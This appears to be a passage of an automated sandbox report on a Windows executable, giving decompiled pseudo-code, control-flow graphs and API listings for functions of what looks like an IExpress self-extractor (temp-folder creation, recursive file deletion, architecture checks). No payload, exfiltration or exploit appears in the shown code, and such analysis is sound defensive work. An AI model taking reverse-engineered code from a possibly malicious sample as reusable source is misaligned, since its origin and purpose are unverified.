                                                                                                                                                                                                                                                0x00052f5f
                                                                                                                                                                                                                                                0x00052f64
                                                                                                                                                                                                                                                0x00052f66
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052f66
                                                                                                                                                                                                                                                0x00052f4f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052f55
                                                                                                                                                                                                                                                0x00052f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00052F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00052FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00052FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 00052FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00052FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005301C
                                                                                                                                                                                                                                                  • Part of subcall function 000551E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00052F4D,?,00000002,00000000), ref: 00055201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-58291647
                                                                                                                                                                                                                                                • Opcode ID: 3e386316da03722453fa70bfa5913e08391b4e692ae0bf06a9fc060cf43a02d0
                                                                                                                                                                                                                                                • Instruction ID: 9d857efd8db334bb61830df59eff31d14d4608f2a1c1187360a12297766339c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e386316da03722453fa70bfa5913e08391b4e692ae0bf06a9fc060cf43a02d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B41B431A007058AFFB0AB71AC556AB37E89B45793F005165AE01D21D2EF78CE8CCB62
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00055467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 522 55467-55484 523 5551c-55528 call 51680 522->523 524 5548a-55490 call 553a1 522->524 528 5552d-55539 call 558c8 523->528 527 55495-55497 524->527 529 55581-55583 527->529 530 5549d-554c0 call 51781 527->530 537 5554d-55552 528->537 538 5553b-55545 CreateDirectoryA 528->538 532 5558d-5559d call 56ce0 529->532 539 554c2-554d8 GetSystemInfo 530->539 540 5550c-5551a call 5658a 530->540 544 55585-5558b 537->544 545 55554-55557 call 5597d 537->545 542 55577-5557c call 56285 538->542 543 55547 538->543 546 554fe 539->546 547 554da-554dd 539->547 540->528 542->529 543->537 544->532 555 5555c-5555e 545->555 556 55503-55507 call 5658a 546->556 553 554f7-554fc 547->553 554 554df-554e2 547->554 553->556 557 554e4-554e7 554->557 558 554f0-554f5 554->558 555->544 559 55560-55566 555->559 556->540 557->540 561 554e9-554ee 557->561 558->556 559->529 562 55568-55575 RemoveDirectoryA 559->562 561->556 562->529
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E00055467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x58004; // 0x5a679bd9
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x591e4;
					_t42 = 0x104;
					E00051680(0x591e4, 0x104);
					L14:
					_t13 = E000558C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x59124 = 0;
							_t14 = 1;
							L24:
							return E00056CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0005597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x58a20; // 0x0
						if(_t61 != 0) {
							 *0x58a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x59124 = E00056285();
						goto L22;
					}
					 *0x58a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E000553A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x591e4;
				E00051781(0x591e4, 0x104, __ecx,  &_v268);
				if(( *0x59a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0005658A(_t48, 0x104, 0x51140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0005658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                                0x00055472
                                                                                                                                                                                                                                                0x00055479
                                                                                                                                                                                                                                                0x00055481
                                                                                                                                                                                                                                                0x00055484
                                                                                                                                                                                                                                                0x0005551c
                                                                                                                                                                                                                                                0x00055521
                                                                                                                                                                                                                                                0x00055528
                                                                                                                                                                                                                                                0x0005552d
                                                                                                                                                                                                                                                0x0005552f
                                                                                                                                                                                                                                                0x00055539
                                                                                                                                                                                                                                                0x0005554d
                                                                                                                                                                                                                                                0x0005554d
                                                                                                                                                                                                                                                0x00055552
                                                                                                                                                                                                                                                0x00055585
                                                                                                                                                                                                                                                0x00055585
                                                                                                                                                                                                                                                0x0005558b
                                                                                                                                                                                                                                                0x0005558d
                                                                                                                                                                                                                                                0x0005559d
                                                                                                                                                                                                                                                0x0005559d
                                                                                                                                                                                                                                                0x00055557
                                                                                                                                                                                                                                                0x0005555e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055560
                                                                                                                                                                                                                                                0x00055566
                                                                                                                                                                                                                                                0x00055569
                                                                                                                                                                                                                                                0x0005556f
                                                                                                                                                                                                                                                0x0005556f
                                                                                                                                                                                                                                                0x00055581
                                                                                                                                                                                                                                                0x00055581
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055581
                                                                                                                                                                                                                                                0x00055545
                                                                                                                                                                                                                                                0x0005557c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005557c
                                                                                                                                                                                                                                                0x00055547
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055547
                                                                                                                                                                                                                                                0x0005548a
                                                                                                                                                                                                                                                0x00055490
                                                                                                                                                                                                                                                0x00055497
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005549d
                                                                                                                                                                                                                                                0x000554ab
                                                                                                                                                                                                                                                0x000554b4
                                                                                                                                                                                                                                                0x000554c0
                                                                                                                                                                                                                                                0x0005550c
                                                                                                                                                                                                                                                0x00055511
                                                                                                                                                                                                                                                0x00055515
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055515
                                                                                                                                                                                                                                                0x000554c9
                                                                                                                                                                                                                                                0x000554d6
                                                                                                                                                                                                                                                0x000554d8
                                                                                                                                                                                                                                                0x000554fe
                                                                                                                                                                                                                                                0x00055503
                                                                                                                                                                                                                                                0x00055507
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055507
                                                                                                                                                                                                                                                0x000554da
                                                                                                                                                                                                                                                0x000554dd
                                                                                                                                                                                                                                                0x000554f7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000554f7
                                                                                                                                                                                                                                                0x000554df
                                                                                                                                                                                                                                                0x000554e2
                                                                                                                                                                                                                                                0x000554f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000554f0
                                                                                                                                                                                                                                                0x000554e7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000554e9
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000554C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005556F
                                                                                                                                                                                                                                                  • Part of subcall function 000553A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000553FB
                                                                                                                                                                                                                                                  • Part of subcall function 000553A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055402
                                                                                                                                                                                                                                                  • Part of subcall function 000553A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005541F
                                                                                                                                                                                                                                                  • Part of subcall function 000553A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005542B
                                                                                                                                                                                                                                                  • Part of subcall function 000553A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-186922987
                                                                                                                                                                                                                                                • Opcode ID: c9539bf640f3b81850ea005948c21032554d1c1c495ed2580b771e59e249b7b1
                                                                                                                                                                                                                                                • Instruction ID: 285e3a011cdae43826108d231f0780ecaf0465d0b54b28f58590d48d1af367dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9539bf640f3b81850ea005948c21032554d1c1c495ed2580b771e59e249b7b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A310871B00F149BDB609F399C746BF77DAAB81343B14412AAD0297291EE748E0D8695
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 648 52390-523b3 649 523b9-523bc 648->649 650 524cb-524df call 56ce0 648->650 649->650 651 523c2-52401 call 51680 call 516b3 FindFirstFileA 649->651 651->650 658 52407-5241f call 51680 651->658 661 52421-5242f lstrcmpA 658->661 662 52479-524a3 call 516b3 SetFileAttributesA DeleteFileA 658->662 663 52431-52443 lstrcmpA 661->663 664 524a9-524b7 FindNextFileA 661->664 662->664 663->664 666 52445-52477 call 516b3 call 5658a call 52390 663->666 664->658 668 524bd-524c5 FindClose RemoveDirectoryA 664->668 666->664 668->650
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E00052390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x58004; // 0x5a679bd9
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00056CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00051680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E000516B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00051680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E000516B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E000516B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0005658A( &_v280, 0x104, 0x51140);
								E00052390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                                0x00052398
                                                                                                                                                                                                                                                0x0005239e
                                                                                                                                                                                                                                                0x000523a3
                                                                                                                                                                                                                                                0x000523a5
                                                                                                                                                                                                                                                0x000523ae
                                                                                                                                                                                                                                                0x000523b3
                                                                                                                                                                                                                                                0x000524cb
                                                                                                                                                                                                                                                0x000524d2
                                                                                                                                                                                                                                                0x000524d3
                                                                                                                                                                                                                                                0x000524d4
                                                                                                                                                                                                                                                0x000524df
                                                                                                                                                                                                                                                0x000523c2
                                                                                                                                                                                                                                                0x000523d1
                                                                                                                                                                                                                                                0x000523db
                                                                                                                                                                                                                                                0x000523e4
                                                                                                                                                                                                                                                0x000523f6
                                                                                                                                                                                                                                                0x000523fc
                                                                                                                                                                                                                                                0x00052401
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052407
                                                                                                                                                                                                                                                0x00052407
                                                                                                                                                                                                                                                0x00052408
                                                                                                                                                                                                                                                0x00052411
                                                                                                                                                                                                                                                0x0005241f
                                                                                                                                                                                                                                                0x0005247a
                                                                                                                                                                                                                                                0x00052483
                                                                                                                                                                                                                                                0x00052495
                                                                                                                                                                                                                                                0x000524a3
                                                                                                                                                                                                                                                0x00052421
                                                                                                                                                                                                                                                0x0005242f
                                                                                                                                                                                                                                                0x00052453
                                                                                                                                                                                                                                                0x0005245d
                                                                                                                                                                                                                                                0x00052466
                                                                                                                                                                                                                                                0x00052472
                                                                                                                                                                                                                                                0x00052472
                                                                                                                                                                                                                                                0x0005242f
                                                                                                                                                                                                                                                0x000524af
                                                                                                                                                                                                                                                0x000524b5
                                                                                                                                                                                                                                                0x000524be
                                                                                                                                                                                                                                                0x000524c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000524c5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,00058A3A,000511F4,00058A3A,00000000,?,?), ref: 000523F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000511F8), ref: 00052427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000511FC), ref: 0005243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00052495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 000524A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000524AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 000524BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(00058A3A), ref: 000524C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: c5be69ed50ca331c4fb98de637c8ae8f77ee2d9938a49b8f5e713f01451b1eb9
                                                                                                                                                                                                                                                • Instruction ID: 14478c1ef3cfbadfce6dc1eb883e9fd67a306c888517ee64971084ab4779806e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5be69ed50ca331c4fb98de637c8ae8f77ee2d9938a49b8f5e713f01451b1eb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F316131604740ABD320DBA4CC89BEF73ECAFC6307F04492DB95586191EB78990D8B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E00052BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x5a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x59124 = 0;
				if(E00052CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00052F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E000552B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x58a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x59a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00051F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x58588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x59124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                                                                0x00052c03
                                                                                                                                                                                                                                                0x00052c0d
                                                                                                                                                                                                                                                0x00052c18
                                                                                                                                                                                                                                                0x00052c20
                                                                                                                                                                                                                                                0x00052c2e
                                                                                                                                                                                                                                                0x00052c32
                                                                                                                                                                                                                                                0x00052c36
                                                                                                                                                                                                                                                0x00052c3d
                                                                                                                                                                                                                                                0x00052c43
                                                                                                                                                                                                                                                0x00052c45
                                                                                                                                                                                                                                                0x00052c47
                                                                                                                                                                                                                                                0x00052c49
                                                                                                                                                                                                                                                0x00052c4e
                                                                                                                                                                                                                                                0x00052c4e
                                                                                                                                                                                                                                                0x00052c47
                                                                                                                                                                                                                                                0x00052c32
                                                                                                                                                                                                                                                0x00052c20
                                                                                                                                                                                                                                                0x00052c50
                                                                                                                                                                                                                                                0x00052c54
                                                                                                                                                                                                                                                0x00052c57
                                                                                                                                                                                                                                                0x00052c64
                                                                                                                                                                                                                                                0x00052c66
                                                                                                                                                                                                                                                0x00052c6b
                                                                                                                                                                                                                                                0x00052c6d
                                                                                                                                                                                                                                                0x00052c74
                                                                                                                                                                                                                                                0x00052c76
                                                                                                                                                                                                                                                0x00052c7c
                                                                                                                                                                                                                                                0x00052c7e
                                                                                                                                                                                                                                                0x00052c87
                                                                                                                                                                                                                                                0x00052c89
                                                                                                                                                                                                                                                0x00052c89
                                                                                                                                                                                                                                                0x00052c87
                                                                                                                                                                                                                                                0x00052c7c
                                                                                                                                                                                                                                                0x00052c74
                                                                                                                                                                                                                                                0x00052c8e
                                                                                                                                                                                                                                                0x00052c95
                                                                                                                                                                                                                                                0x00052c98
                                                                                                                                                                                                                                                0x00052c98
                                                                                                                                                                                                                                                0x00052c9e
                                                                                                                                                                                                                                                0x00052ca7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00056BB0,00050000,00000000,00000002,0000000A), ref: 00052C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00056BB0,00050000,00000000,00000002,0000000A), ref: 00052C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00052C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00056BB0,00050000,00000000,00000002,0000000A), ref: 00052C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: 19b929f51b14aebbd9155dbc9b336b148430a72502164d80b97bbfd1428003db
                                                                                                                                                                                                                                                • Instruction ID: b32f3722e7014198e25792d01778be38db87490c4979a35a21abc3e9b253066a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19b929f51b14aebbd9155dbc9b336b148430a72502164d80b97bbfd1428003db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11C2313007059BEB206BB5AC89BAF3F999F87393F044125FD01E3293DA39EC498665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00056F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00056F40() {

				SetUnhandledExceptionFilter(E00056EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                                0x00056f45
                                                                                                                                                                                                                                                0x00056f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00056F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                • Opcode ID: e0cce5e67720fa7f2a2f67cc3dd5da961f343d196c48e74fc06c2e8c02ad2b85
                                                                                                                                                                                                                                                • Instruction ID: 04f6fde143cff02d02e2d4f5bbf5456a3d22581349ce33cd9dfe88a02abdc362
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0cce5e67720fa7f2a2f67cc3dd5da961f343d196c48e74fc06c2e8c02ad2b85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E90026435260047A7111B709D1A417B5919B4E603BC15560A511C9494DB6540445516
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
